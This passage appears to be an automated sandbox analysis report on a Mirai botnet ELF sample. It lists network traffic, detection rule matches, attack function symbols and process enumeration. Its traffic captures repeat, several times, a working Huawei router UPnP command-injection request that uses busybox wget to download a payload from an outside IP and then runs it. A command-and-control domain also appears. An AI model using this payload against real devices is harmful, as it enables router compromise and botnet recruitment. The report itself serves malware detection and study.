?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: /tmp/WIwTo1UTMq.elf (PID: 5525)Socket: 127.0.0.1:8345Jump to behavior
                Source: unknownTCP traffic detected without corresponding DNS query: 41.246.125.122
                Source: unknownTCP traffic detected without corresponding DNS query: 41.103.19.122
                Source: unknownTCP traffic detected without corresponding DNS query: 157.19.62.113
                Source: unknownTCP traffic detected without corresponding DNS query: 41.254.241.72
                Source: unknownTCP traffic detected without corresponding DNS query: 184.188.4.253
                Source: unknownTCP traffic detected without corresponding DNS query: 157.157.132.237
                Source: unknownTCP traffic detected without corresponding DNS query: 41.234.183.150
                Source: unknownTCP traffic detected without corresponding DNS query: 197.255.12.216
                Source: unknownTCP traffic detected without corresponding DNS query: 197.78.44.191
                Source: unknownTCP traffic detected without corresponding DNS query: 197.79.237.252
                Source: unknownTCP traffic detected without corresponding DNS query: 197.194.216.242
                Source: unknownTCP traffic detected without corresponding DNS query: 157.53.239.53
                Source: unknownTCP traffic detected without corresponding DNS query: 197.30.1.118
                Source: unknownTCP traffic detected without corresponding DNS query: 157.0.130.246
                Source: unknownTCP traffic detected without corresponding DNS query: 41.143.15.18
                Source: unknownTCP traffic detected without corresponding DNS query: 197.197.180.14
                Source: unknownTCP traffic detected without corresponding DNS query: 207.108.14.112
                Source: unknownTCP traffic detected without corresponding DNS query: 197.167.160.236
                Source: unknownTCP traffic detected without corresponding DNS query: 157.227.157.81
                Source: unknownTCP traffic detected without corresponding DNS query: 157.240.175.32
                Source: unknownTCP traffic detected without corresponding DNS query: 61.22.190.108
                Source: unknownTCP traffic detected without corresponding DNS query: 197.180.65.41
                Source: unknownTCP traffic detected without corresponding DNS query: 157.99.99.134
                Source: unknownTCP traffic detected without corresponding DNS query: 197.116.207.198
                Source: unknownTCP traffic detected without corresponding DNS query: 41.113.87.213
                Source: unknownTCP traffic detected without corresponding DNS query: 157.144.55.235
                Source: unknownTCP traffic detected without corresponding DNS query: 197.136.189.68
                Source: unknownTCP traffic detected without corresponding DNS query: 197.174.75.69
                Source: unknownTCP traffic detected without corresponding DNS query: 41.190.82.104
                Source: unknownTCP traffic detected without corresponding DNS query: 41.167.142.160
                Source: unknownTCP traffic detected without corresponding DNS query: 197.130.107.44
                Source: unknownTCP traffic detected without corresponding DNS query: 157.131.83.80
                Source: unknownTCP traffic detected without corresponding DNS query: 197.113.28.145
                Source: unknownTCP traffic detected without corresponding DNS query: 41.234.173.92
                Source: unknownTCP traffic detected without corresponding DNS query: 157.194.249.71
                Source: unknownTCP traffic detected without corresponding DNS query: 197.76.235.85
                Source: unknownTCP traffic detected without corresponding DNS query: 157.253.160.68
                Source: unknownTCP traffic detected without corresponding DNS query: 211.6.214.175
                Source: unknownTCP traffic detected without corresponding DNS query: 149.76.30.6
                Source: unknownTCP traffic detected without corresponding DNS query: 197.43.30.179
                Source: unknownTCP traffic detected without corresponding DNS query: 197.112.4.97
                Source: unknownTCP traffic detected without corresponding DNS query: 197.12.225.63
                Source: unknownTCP traffic detected without corresponding DNS query: 41.160.9.226
                Source: unknownTCP traffic detected without corresponding DNS query: 158.129.148.234
                Source: unknownTCP traffic detected without corresponding DNS query: 197.1.219.105
                Source: unknownTCP traffic detected without corresponding DNS query: 41.232.167.103
                Source: unknownTCP traffic detected without corresponding DNS query: 197.96.107.38
                Source: unknownTCP traffic detected without corresponding DNS query: 197.32.97.173
                Source: unknownTCP traffic detected without corresponding DNS query: 217.255.162.157
                Source: unknownTCP traffic detected without corresponding DNS query: 41.119.153.117
                Source: global trafficDNS traffic detected: DNS query: cyberbotne.stresse.live
                Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: WIwTo1UTMq.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: WIwTo1UTMq.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

                System Summary

                barindex
                Source: WIwTo1UTMq.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
                Source: WIwTo1UTMq.elf, type: SAMPLEMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
                Source: 5525.1.00007f1cf8017000.00007f1cf802f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
                Source: 5525.1.00007f1cf8017000.00007f1cf802f000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
                Source: ELF static info symbol of initial sampleName: attack.c
                Source: ELF static info symbol of initial sampleName: attack_get_opt_int
                Source: ELF static info symbol of initial sampleName: attack_get_opt_ip
                Source: ELF static info symbol of initial sampleName: attack_gre.c
                Source: ELF static info symbol of initial sampleName: attack_gre_eth
                Source: ELF static info symbol of initial sampleName: attack_gre_ip
                Source: ELF static info symbol of initial sampleName: attack_init
                Source: ELF static info symbol of initial sampleName: attack_kill_all
                Source: ELF static info symbol of initial sampleName: attack_ongoing
                Source: ELF static info symbol of initial sampleName: attack_parse
                Source: WIwTo1UTMq.elfELF static info symbol of initial sample: __gnu_unwind_execute
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                Source: WIwTo1UTMq.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
                Source: WIwTo1UTMq.elf, type: SAMPLEMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
                Source: 5525.1.00007f1cf8017000.00007f1cf802f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
                Source: 5525.1.00007f1cf8017000.00007f1cf802f000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
                Source: classification engineClassification label: mal100.troj.evad.linELF@0/0@73/0

                Data Obfuscation

                barindex
                Source: /tmp/WIwTo1UTMq.elf (PID: 5531)Deleted: /dev/kmsgJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/110/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/231/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/111/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/112/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/233/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/113/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/114/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/235/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/115/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/1333/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/116/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/1695/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/117/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/118/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/119/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/911/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/914/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/10/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/917/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/11/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/12/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/13/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/14/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/15/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/16/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/17/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/18/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/19/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/1591/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/120/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/121/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/1/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/122/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/243/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/2/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/123/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/3/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/124/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/1588/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/125/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/4/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/246/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/126/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/5/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/127/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/6/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/1585/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/128/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/7/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/129/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/8/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/800/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/9/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/802/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/803/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/804/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/20/cmdlineJump to behavior
